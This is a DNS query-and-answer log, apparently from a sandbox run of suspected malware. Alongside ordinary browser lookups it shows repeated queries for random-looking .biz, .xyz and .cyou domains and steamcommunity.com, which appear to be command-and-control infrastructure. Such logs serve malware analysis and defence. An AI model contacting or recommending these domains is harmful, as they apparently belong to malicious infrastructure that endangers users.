Dec 14, 2024 23:59:48.009363890 CET	192.168.2.4	1.1.1.1	0x118f	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Dec 14, 2024 23:59:48.010672092 CET	192.168.2.4	1.1.1.1	0x62d0	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Dec 14, 2024 23:59:48.148554087 CET	192.168.2.4	1.1.1.1	0x4da3	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.149399042 CET	192.168.2.4	1.1.1.1	0x5c3f	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.149740934 CET	192.168.2.4	1.1.1.1	0x3a5c	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 23:59:48.287122965 CET	192.168.2.4	1.1.1.1	0x856c	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.289161921 CET	192.168.2.4	1.1.1.1	0x2292	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.426388979 CET	192.168.2.4	1.1.1.1	0xea20	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Dec 14, 2024 23:59:48.427289963 CET	192.168.2.4	1.1.1.1	0x5ecf	Standard query (0)	twitter.com	28	IN (0x0001)	false
Dec 14, 2024 23:59:55.425920963 CET	192.168.2.4	1.1.1.1	0x7288	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 14, 2024 23:59:59.444303989 CET	192.168.2.4	1.1.1.1	0x6c75	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 15, 2024 00:00:20.679172993 CET	192.168.2.4	1.1.1.1	0x83ec	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:00:20.821362972 CET	192.168.2.4	1.1.1.1	0xd155	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 15, 2024 00:01:02.063227892 CET	192.168.2.4	1.1.1.1	0x65e3	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 15, 2024 00:01:03.299452066 CET	192.168.2.4	1.1.1.1	0x8b9	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:01:56.978410006 CET	192.168.2.4	1.1.1.1	0xf112	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 15, 2024 00:01:58.207865000 CET	192.168.2.4	1.1.1.1	0x3592	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:02:23.603111982 CET	192.168.2.4	1.1.1.1	0x7984	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:02:23.741420031 CET	192.168.2.4	1.1.1.1	0xdb0d	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:02:23.879605055 CET	192.168.2.4	1.1.1.1	0xe5c5	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 15, 2024 00:03:54.863552094 CET	192.168.2.4	1.1.1.1	0x5475	Standard query (0)	tacitglibbr.biz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:57.266580105 CET	192.168.2.4	1.1.1.1	0xa047	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:59.392564058 CET	192.168.2.4	1.1.1.1	0xe96	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:01.507391930 CET	192.168.2.4	1.1.1.1	0xe14a	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:01.651374102 CET	192.168.2.4	1.1.1.1	0xcdb8	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:01.794864893 CET	192.168.2.4	1.1.1.1	0xcda7	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:01.942157030 CET	192.168.2.4	1.1.1.1	0x3970	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:02.085051060 CET	192.168.2.4	1.1.1.1	0xeef7	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:02.233334064 CET	192.168.2.4	1.1.1.1	0xc68e	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:02.377780914 CET	192.168.2.4	1.1.1.1	0x1ff0	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:09.327243090 CET	192.168.2.4	1.1.1.1	0x77ba	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:16.928520918 CET	192.168.2.4	1.1.1.1	0xa8a1	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.073029995 CET	192.168.2.4	1.1.1.1	0x67bf	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.217113972 CET	192.168.2.4	1.1.1.1	0xb9de	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.362205029 CET	192.168.2.4	1.1.1.1	0x5b1f	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.505011082 CET	192.168.2.4	1.1.1.1	0xaa88	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.646810055 CET	192.168.2.4	1.1.1.1	0xdd2f	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:51.449697971 CET	192.168.2.4	1.1.1.1	0xc626	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:51.593182087 CET	192.168.2.4	1.1.1.1	0x793a	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:51.732125044 CET	192.168.2.4	1.1.1.1	0x6969	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:51.875013113 CET	192.168.2.4	1.1.1.1	0x6b1d	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:52.017342091 CET	192.168.2.4	1.1.1.1	0xfdec	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:52.161087036 CET	192.168.2.4	1.1.1.1	0x60cf	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:52.306804895 CET	192.168.2.4	1.1.1.1	0x49d6	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:05:05.206666946 CET	192.168.2.4	1.1.1.1	0x590b	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:05:05.349920034 CET	192.168.2.4	1.1.1.1	0x345d	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:05:05.488230944 CET	192.168.2.4	1.1.1.1	0xe2ad	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Dec 15, 2024 00:05:58.462433100 CET	192.168.2.4	1.1.1.1	0x3b73	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Dec 15, 2024 00:05:59.706816912 CET	192.168.2.4	1.1.1.1	0x5bc	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:05:59.903012991 CET	192.168.2.4	1.1.1.1	0x5bc	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 14, 2024 23:58:16.678281069 CET	1.1.1.1	192.168.2.4	0x217e	No error (0)	shineugler.biz		104.21.51.88	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:16.678281069 CET	1.1.1.1	192.168.2.4	0x217e	No error (0)	shineugler.biz		172.67.177.250	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:18.878488064 CET	1.1.1.1	192.168.2.4	0xd216	No error (0)	immureprech.biz		104.21.22.222	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:18.878488064 CET	1.1.1.1	192.168.2.4	0xd216	No error (0)	immureprech.biz		172.67.207.38	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:21.237194061 CET	1.1.1.1	192.168.2.4	0x126d	No error (0)	deafeninggeh.biz		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:21.237194061 CET	1.1.1.1	192.168.2.4	0x126d	No error (0)	deafeninggeh.biz		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:21.237194061 CET	1.1.1.1	192.168.2.4	0x126d	No error (0)	deafeninggeh.biz		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:21.237194061 CET	1.1.1.1	192.168.2.4	0x126d	No error (0)	deafeninggeh.biz		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:21.237194061 CET	1.1.1.1	192.168.2.4	0x126d	No error (0)	deafeninggeh.biz		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:21.237194061 CET	1.1.1.1	192.168.2.4	0x126d	No error (0)	deafeninggeh.biz		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:21.237194061 CET	1.1.1.1	192.168.2.4	0x126d	No error (0)	deafeninggeh.biz		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:23.747914076 CET	1.1.1.1	192.168.2.4	0x602d	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:23.998488903 CET	1.1.1.1	192.168.2.4	0x4b4e	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:24.221201897 CET	1.1.1.1	192.168.2.4	0x2daf	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:24.453278065 CET	1.1.1.1	192.168.2.4	0x757e	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:24.673103094 CET	1.1.1.1	192.168.2.4	0xe8fd	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:24.905353069 CET	1.1.1.1	192.168.2.4	0xe7c1	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:25.045207024 CET	1.1.1.1	192.168.2.4	0xd687	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:35.493642092 CET	1.1.1.1	192.168.2.4	0xdb67	No error (0)	tacitglibbr.biz		104.21.50.161	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:35.493642092 CET	1.1.1.1	192.168.2.4	0xdb67	No error (0)	tacitglibbr.biz		172.67.164.37	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:41.860363007 CET	1.1.1.1	192.168.2.4	0xb7f0	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.075987101 CET	1.1.1.1	192.168.2.4	0x3604	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.350766897 CET	1.1.1.1	192.168.2.4	0xcbe2	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.492794037 CET	1.1.1.1	192.168.2.4	0x5e41	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.634174109 CET	1.1.1.1	192.168.2.4	0x4a73	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.773727894 CET	1.1.1.1	192.168.2.4	0xa547	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:42.914654970 CET	1.1.1.1	192.168.2.4	0x391a	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:50.741569042 CET	1.1.1.1	192.168.2.4	0x699a	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:50.747531891 CET	1.1.1.1	192.168.2.4	0xac1e	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 14, 2024 23:58:55.343075991 CET	1.1.1.1	192.168.2.4	0x22c9	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:55.881186008 CET	1.1.1.1	192.168.2.4	0x5622	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.020910978 CET	1.1.1.1	192.168.2.4	0x45d0	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.163876057 CET	1.1.1.1	192.168.2.4	0x234f	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.294570923 CET	1.1.1.1	192.168.2.4	0x5a8f	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.336038113 CET	1.1.1.1	192.168.2.4	0x3747	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.439107895 CET	1.1.1.1	192.168.2.4	0x731	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.476206064 CET	1.1.1.1	192.168.2.4	0x3ab2	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:56.615963936 CET	1.1.1.1	192.168.2.4	0x28fa	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:57.408698082 CET	1.1.1.1	192.168.2.4	0x3245	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:58:57.408698082 CET	1.1.1.1	192.168.2.4	0x3245	No error (0)	plus.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:58:57.408819914 CET	1.1.1.1	192.168.2.4	0xb1cd	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:01.991516113 CET	1.1.1.1	192.168.2.4	0x76e7	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:01.991516113 CET	1.1.1.1	192.168.2.4	0x76e7	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:01.991640091 CET	1.1.1.1	192.168.2.4	0xbcab	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:02.137182951 CET	1.1.1.1	192.168.2.4	0x5f6d	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:02.144768953 CET	1.1.1.1	192.168.2.4	0x8588	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:02.276631117 CET	1.1.1.1	192.168.2.4	0x4f2b	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 14, 2024 23:59:02.283185005 CET	1.1.1.1	192.168.2.4	0xc579	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 14, 2024 23:59:08.227180958 CET	1.1.1.1	192.168.2.4	0x9174	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:08.227180958 CET	1.1.1.1	192.168.2.4	0x9174	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.232964039 CET	1.1.1.1	192.168.2.4	0xf65a	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:08.232964039 CET	1.1.1.1	192.168.2.4	0xf65a	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.278230906 CET	1.1.1.1	192.168.2.4	0x41f4	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.366559982 CET	1.1.1.1	192.168.2.4	0x4c91	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.416380882 CET	1.1.1.1	192.168.2.4	0xe49d	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:08.842022896 CET	1.1.1.1	192.168.2.4	0x4946	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:08.842022896 CET	1.1.1.1	192.168.2.4	0x4946	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:09.571844101 CET	1.1.1.1	192.168.2.4	0x9f15	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:10.094645023 CET	1.1.1.1	192.168.2.4	0x7fc	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:10.372955084 CET	1.1.1.1	192.168.2.4	0x20eb	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:10.372955084 CET	1.1.1.1	192.168.2.4	0x20eb	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:10.372955084 CET	1.1.1.1	192.168.2.4	0x20eb	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:10.519777060 CET	1.1.1.1	192.168.2.4	0x7ffd	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:10.671466112 CET	1.1.1.1	192.168.2.4	0x4ee	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Dec 14, 2024 23:59:20.464323997 CET	1.1.1.1	192.168.2.4	0x6824	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:20.464605093 CET	1.1.1.1	192.168.2.4	0x4ee4	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:20.464605093 CET	1.1.1.1	192.168.2.4	0x4ee4	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:22.695331097 CET	1.1.1.1	192.168.2.4	0x8fac	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:22.695331097 CET	1.1.1.1	192.168.2.4	0x8fac	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:22.697077036 CET	1.1.1.1	192.168.2.4	0x8fac	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:22.697077036 CET	1.1.1.1	192.168.2.4	0x8fac	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:23.019160986 CET	1.1.1.1	192.168.2.4	0x38cf	Name error (3)	se-blurry.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:23.166455984 CET	1.1.1.1	192.168.2.4	0xb204	Name error (3)	zinc-sneark.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:23.308137894 CET	1.1.1.1	192.168.2.4	0x3f99	Name error (3)	dwell-exclaim.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:23.461435080 CET	1.1.1.1	192.168.2.4	0x971b	Name error (3)	formy-spill.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:23.604289055 CET	1.1.1.1	192.168.2.4	0x6608	Name error (3)	covery-mover.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:23.745397091 CET	1.1.1.1	192.168.2.4	0xef4d	Name error (3)	dare-curbys.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:23.884608984 CET	1.1.1.1	192.168.2.4	0xbb0	Name error (3)	print-vexer.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:24.031393051 CET	1.1.1.1	192.168.2.4	0xc71d	Name error (3)	impend-differ.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:24.171988010 CET	1.1.1.1	192.168.2.4	0x7985	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:30.294528961 CET	1.1.1.1	192.168.2.4	0x602c	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:30.742542028 CET	1.1.1.1	192.168.2.4	0x687f	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:30.883472919 CET	1.1.1.1	192.168.2.4	0xb6e9	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:31.023555994 CET	1.1.1.1	192.168.2.4	0xd1ea	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:31.164627075 CET	1.1.1.1	192.168.2.4	0x1a20	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:31.304280043 CET	1.1.1.1	192.168.2.4	0xf064	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:36.436768055 CET	1.1.1.1	192.168.2.4	0x5ab3	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:36.436768055 CET	1.1.1.1	192.168.2.4	0x5ab3	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:36.436768055 CET	1.1.1.1	192.168.2.4	0x5ab3	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:36.436801910 CET	1.1.1.1	192.168.2.4	0x5ab3	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:36.436801910 CET	1.1.1.1	192.168.2.4	0x5ab3	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:36.436801910 CET	1.1.1.1	192.168.2.4	0x5ab3	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:36.855178118 CET	1.1.1.1	192.168.2.4	0xadad	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:36.855210066 CET	1.1.1.1	192.168.2.4	0xadad	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:39.838422060 CET	1.1.1.1	192.168.2.4	0xa7f9	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:39.976757050 CET	1.1.1.1	192.168.2.4	0x951f	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.020097017 CET	1.1.1.1	192.168.2.4	0x94d8	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.021440029 CET	1.1.1.1	192.168.2.4	0xbdc6	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:40.021440029 CET	1.1.1.1	192.168.2.4	0xbdc6	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.177120924 CET	1.1.1.1	192.168.2.4	0xb1b4	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:40.177120924 CET	1.1.1.1	192.168.2.4	0xb1b4	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.326607943 CET	1.1.1.1	192.168.2.4	0x8077	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.382394075 CET	1.1.1.1	192.168.2.4	0xea84	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.458072901 CET	1.1.1.1	192.168.2.4	0xea84	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:40.594801903 CET	1.1.1.1	192.168.2.4	0x181a	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:41.008641005 CET	1.1.1.1	192.168.2.4	0x17e6	No error (0)	www.google.com		172.217.19.228	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:41.009381056 CET	1.1.1.1	192.168.2.4	0xa992	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 14, 2024 23:59:42.777077913 CET	1.1.1.1	192.168.2.4	0xa8f1	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:42.777077913 CET	1.1.1.1	192.168.2.4	0xa8f1	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:42.777077913 CET	1.1.1.1	192.168.2.4	0xa8f1	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:42.777077913 CET	1.1.1.1	192.168.2.4	0xa8f1	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:42.916160107 CET	1.1.1.1	192.168.2.4	0xb0ba	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:42.916160107 CET	1.1.1.1	192.168.2.4	0xb0ba	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:42.916160107 CET	1.1.1.1	192.168.2.4	0xb0ba	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:42.916160107 CET	1.1.1.1	192.168.2.4	0xb0ba	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:43.122945070 CET	1.1.1.1	192.168.2.4	0x2de9	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:43.147090912 CET	1.1.1.1	192.168.2.4	0x1257	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 23:59:43.147090912 CET	1.1.1.1	192.168.2.4	0x1257	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
